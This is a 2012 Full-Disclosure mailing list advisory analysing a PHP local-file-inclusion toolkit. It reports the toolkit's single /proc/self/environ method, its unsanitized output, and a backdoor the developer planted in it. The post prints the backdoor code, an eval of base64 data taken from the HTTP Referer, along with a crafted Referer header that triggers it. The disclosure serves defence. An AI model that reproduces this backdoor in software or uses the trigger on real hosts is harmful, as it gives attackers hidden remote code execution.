Date: Sun, 19 Feb 2012 12:01:47 -0500
From: InterN0T Advisories <advisories@...ern0t.net>
To: <full-disclosure@...ts.grok.org.uk>
Subject: Analysis of the "r00t 4 LFI Toolkit"

Dear Full Disclosure readers,


Today I saw Joe McCray among others, tweet about the (new) "r00t 4 LFI
Toolkit", that according to its description:
-------------------------------------------
This tool is a php script that assists in performing local file inclusion
attacks.
-------------------------------------------

>> Should be able to perform local file inclusion attacks.


-:: Overview ::- 

After studying this tool for a brief 5 minutes, it was obvious that it was
nowhere what I hoped it to be, as the tool only use one method, the
"/proc/self/environ" vector (as seen on e.g., the intern0t forums and many
other sites). 

The tool is therefore, not capable of performing "attacks", but only 1,
single type of LFI attack. (Note that the 'S' has been removed.) 

The method this tool uses, is far from new and doesn't always work either,
but it's a nice trick that e.g., SirGod wrote about on the intern0t forums
in 2009. (This tool was released the 18th February 2012.)


-:: Vulnerabilities ::- 

Further study of this tool reveals:
- None of the output from the tool is sanitized, meaning the attacker
using the script, can get XSS'd (and CSRF'd), if the target has changed
e.g., the 'uname -a' command (which is relatively simple to do), to include
(print) JavaScript instead. If this happens, the attacker may end up
attacking himself, crashing or something third, depending on the type of
XSS payload.

- The most interesting part, is on line 92, where the "developer"
(KedAns-Dz), has decided to >>backdoor<< the tool.


-:: The Backdoor ::- 

Analysis of the backdoor:
By sending a HTTP request, that includes a specially crafted referer, it
is possible to execute PHP code:
-------------------------------------------
Referer: a1=iz&a2=&a3=&a4=&a5=&a6=&a7=&a8=&a0=cGhwaW5mbygpOw==
-------------------------------------------


This referer will make the script execute: phpinfo();


-:: Code Review ::-

The code that enables the developer to use the script as a backdoor looks
like the following:
-------------------------------------------
parse_str($_SERVER['HTTP_REFERER'],$a); if(reset($a)=='iz' &&
count($a)==9) { echo '<star>';eval(base64_decode(str_replace(" ", "+",
join(array_slice($a,count($a)-3)))));echo '</star>';} 
-------------------------------------------


It certainly took a little bit of study to trigger, but in essence here's
what it do:
1. Parse the HTTP Referer string into variable: $a ("Referer:" is not
included.)
2. If the first array value (not key / arg), is a string named: iz
3. And if there's 9 (different) arrays, then
4. Print out the contents of..


This requires a bit more in-depth explanation:
A) Evaluate the following as PHP code:
B) Base64_decode the input:
C) Replace " " (space) with "+" (plus), in case they occur.
D) Use the last three array values from the HTTP referer.
(You don't have to use all three, using the last will work fine.)


To make it all a lot more simple:
-------------------------------------------
Referer:Array1=iz&Array2=&Array3=&Array4=&Array5=&Array6=&Array7=&Array8=&Array0=[BASE64
Code that will be executed as PHP.]
-------------------------------------------


Screenshot:
http://i.imgur.com/PXcSX.png


References:
http://forum.intern0t.org/offensive-guides-information/4113-analysis-r00t-4-local-file-inclusion-toolkit.html
http://forum.intern0t.org/general-hacking-discussions/1258-shell-via-local-file-inclusion-proc-self-environ-method-step-step.html
http://packetstormsecurity.org/files/109940/
https://twitter.com/#!/j0emccray/status/170941195030233090
https://twitter.com/#!/EChavarro/status/170941489629761537
http://i.imgur.com/PXcSX.png



Best regards,
MaXe

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists